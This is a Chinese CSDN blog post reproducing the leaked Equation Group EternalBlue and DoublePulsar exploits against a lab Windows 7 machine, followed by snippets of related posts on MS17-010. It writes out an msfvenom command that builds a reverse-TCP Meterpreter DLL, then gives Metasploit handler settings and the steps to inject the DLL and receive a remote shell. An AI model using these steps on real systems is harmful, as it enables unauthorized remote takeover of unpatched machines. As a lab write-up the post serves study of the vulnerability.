方程式复现

最新推荐文章于 2019-09-23 22:03:51 发布
最新推荐文章于 2019-09-23 22:03:51 发布
阅读量327 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HxXhY/article/details/79446807
版权

攻击机:                                                                      靶机:

Windows7 含方程式攻击脚本                                         Windows7

Ip:192.168..148.133                                                       ip:192.168.148.134

Kali msf

Ip:192.168.148.128


准备工作需要用msf生成一个dll用于后期shell的反弹

Msfvenom –p windows/x64/meterpreter/reverse_tcp      LHOST=192.168.148.128 LPORT=11111-f dll > ~/桌面/hack.dll

其中LHOST是shell连接的ip地址,也就是kali的地址 端口11111连接kali的11111端口

我们把生成的dll放到win7攻击机中,放在C盘根目录

进入win7攻击机,运行fb.py

然后设置攻击目标的ip:192.168.148.134                 我们攻击机本身的ip:192.168.148.133


这里注意一下,这个重定向一定要选no,要不然用msf反弹的shell是攻击机win7的shell就不是靶机的shell了


然后一路过就可以,然后使用Eternalblue这个攻击模块

use Eternalblue

一路回车就可以,可以看到我们攻击的点,注意,这两个模式均选择1

因测试靶机而异了

然后一路回车,Eternalblue模块攻击成功

接下来使用Doublepulsar模块攻击(在Eternalblue模块攻击成功的前提),这个模块可以理解为上传一个木马,我们把我们准备阶段的dll放上去

与此同时,我们要在我们kali攻击机开启msf,来监听反弹的shell,一旦Doublepulsar这个模块攻击成功,我们的msf就会收到来自靶机的shell

手动分割线,进入kali

===========================================================================

我们开启msf

在msf中用handler这个模块


我们设置一下

LHOST 192.168.148.128  shell反弹的地址

LPORT 11111 连接的端口

这个与我们刚开始生成那个dll设置的选项得一致

最后设置一下payload,这个payload与生成dll的payload一致


然后exploit进行攻击,等着shell回连


===========================================================================

然后我们回到攻击机win7中,使用Doublepulsar模块攻击


可看到我们之前设置的选项,这里注意下,选择红色箭头标的


3389端口利用无法复现,可能放出来的这个exp有问题吧


这里我们选rundll,把msf生成的dll绑到用户的进程当中,并填写我们传的dll的路径,我把它放在c盘根目录了 c:\\hack.dll

下面一路回车就行


看到攻击成功,我们去kali看看shell连上了吗


可以看到shell连接成功,那我们就留下点我们的痕迹吧












HxXhY
关注
利用NSA方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)
weixin_38948797的博客
01-27 1万+
利用方程式工具—“永恒之蓝”攻陷一台计算(MS17-010)  (注:本文章仅供技术交流和学习,请勿用于非法用途)     相信17年最大的安全事件比特币勒索病毒Wanncary没几个人不知道吧。那么究竟比特币勒索病毒究竟是怎么一回事呢?所谓比特币勒索病毒即:永恒之蓝漏洞利用程序+Wannacry勒索软件程序,也正是这两个武器造就了迄今为止最巨大的网络攻击勒索事件,影响到近百个国家上千家企业及
ShadowBrokers方程式工具包浅析
BaymaxJW的博客
01-23 2501
一、解密后的工具包: 其中Windows目录包括Windows利用工具和相关攻击代码,swift目录中是银行攻击的一些证据,oddjob目录是植入后门等相关文档。 Windows目录:(包含了各种漏洞利用工具,在exploits中包含了丰富的漏洞利用工具,可影响windows多个平台) 三个比较重要的文件:exploits,fuzzbunch,specials A:exploits...
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。方式可以直接打靶机,可以上传到跳板机执行。
方程式ETERNALBLUE 之fb.py的复现
weixin_34226706的博客
03-30 1007
方程式ETERNALBLUE之fb.py的复现 1.环境简介***机win2003ip:192.168.1.105***机kali:ip:192.168.1.106靶机(被***机)window7 x64(未装smb漏洞补丁)ip:192.168.1.100 2.windows2003***机***机win2003安装环境:python-2.6.6.msihttps://www.python.o...
NSA方程式Easybee攻击程序漏洞复现与分析
weixin_34111790的博客
08-01 455
影子经纪人(Shadow Brokers)最近曝光的NSA方程式Windows攻击程序中有一个针对Mdaemon邮件服务器漏洞的远程攻击程序——Easybee,本文将对Easybee漏洞攻击进行复现,并分析漏洞攻击原理。 环境搭建 Easybee是针对Mdaemon邮件服务器远程逻辑漏洞的攻击程序,它支持对下列版本的Mdaemon服务器进行攻击: 9...
方程式0day图形化利用工具
weixin_30786657的博客
04-18 2062
最近方程式的漏洞着实活了一把,分析了下githup上面的文件目录,找到了利用文件,主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议,其他的没写,基本上一样的吧,程序主界面如下图: 简单说下实现过程,仔细翻过的朋友肯定看到其中的.exe文...
score_sde:通过随机微分方程式基于分数的生成建模的官方代码(ICLR 2021,口头)
04-01
通过随机微分方程的基于分数的生成建模 此存储库包含论文的正式实现 作者:, , , , 和 我们提出了一个统一的框架,该框架通过随机微分方程(SDE)的角度概括和改进了基于分数的生成模型的先前工作。 特别是,...
POD_G-方程式:本文的代码https:arxiv.orgabs1812.09853
02-18
通过这个代码库,研究者可以复现论文中的计算结果,进一步理解POD_G-方程式的应用,并可能将其应用于自己的研究问题。对于学习者来说,这是一个深入了解POD方法和Galerkin方法实际应用的宝贵资源,可以借此加深对...
高性能方程式赛车电池组.zip(毕设&课设&实训&大作业&竞赛&项目)
最新发布
09-21
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助...
方程式 Eternalblue 漏洞利用复现
VinK1的博客
04-19 6573
漏洞原理详细的漏洞原理参照文章: http://www.91ri.org/16946.html 懒得点连接的大人们可以看这里: 首先SrvOs2FeaListToNt首先调用SrvOs2FeaListSizeToNt计算pNtFea的大小。这里注意了SrvOs2FeaListSizeToNt函数会修改原始的pOs2Fea中的Length大小,本来Length是一个DWORD, 代码还强制转换
NSA方程式工具利用与分析
sherlly666的博客
04-24 2万+
NSA方程式工具利用与分析 NSA Eternalblue Windows漏洞 下载地址:https://yadi.sk/d/NJqzpqo_3GxZA4 解压密码:Reeeeeeeeeeeeeee github下载地址:https://github.com/misterch0c/shadowbroker释放的工具总共包含三个文件夹, Swift:包含了NSA对SWIFT银行系统发动攻击的相关证据,其
永恒之蓝漏洞复现
weixin_44897902的博客
09-23 276
参考: https://blog.csdn.net/n5xxxx__zy/article/details/90705057 目标ip:192.168.91.149 攻击机:192.168.91.146 目标系统:win7 攻击机:kail 准备工作: 目标机:win7开启网络共享:控制面板-网络和共享中心-更改高级共享设置-启用网络发现-关闭密码保护共享-保存修改 攻击机:开启postgres...
方程式组织攻击模块图
Websec
02-15 868
windows 2008 CVE-2017-0148 方程式工具-永恒之蓝 修复
陈洋的博客
04-26 4038
windows 2008 CVE-2017-0148 方程式工具-永恒之蓝 修复 windows 2008R2 445端口 - 注册表禁用SMB服务 禁用SMBv1 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Valu...
ms17010漏洞复现-2003
aiquan9342的博客
04-29 572
先使用Smbtouch模块检测一下是否有漏洞。 然后使用Doublepulsar写一个shellcode到本地。 生成成功后的截图: 再使用EternalRomance植入Doublepulsar后门。 成功的截图: PS:仿佛是由于之前已经上传过bin的缘故,第二次测试的时候失败了。但是不影响后续操作。 都成功了以后该我们的Doublepulsar来反弹she...
方程式漏洞之复现window2008/win7 远程命令执行漏洞
aiquan9342的博客
04-23 226
前几天就想写的,因为一些缘故就没写。此次是在外网环境下进行的。大家在内网中也一个样。 方法:   使用Eternalblue模块,剑测是否有漏洞然后msf生成一个dll直接反弹shell. PS:win版本的不知道缘何生成出来的dll是0kb 我就在自己本地的虚拟机生成了一个dll。生成dll命令 msfvenom -p windows/x64/meterpreter/rev...
MS17010(永恒之蓝)漏洞利用与复现
热门推荐
马赛克的博客
04-18 2万+
一:前言 Ehernal Blue通过Tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只需要开机上网,攻击者就能在电脑和服务器中植入勒索软件。 复现环境:攻击机 kali IP:10.10.10.136 ...
MS17-010 ——永恒之蓝漏洞利用
迷风小白
06-20 6816
“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器,利用Windows系统的SMB漏洞可以获取系最高权限。 影响范围:Windows Vista、Win7、Win8、Win XP、Windows server 2003等。 防范措施:及时更新Windows系统补丁,不要打开陌生的文件。 环境: 攻击机:kali IP:192.168.137.44 靶机:win7 IP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值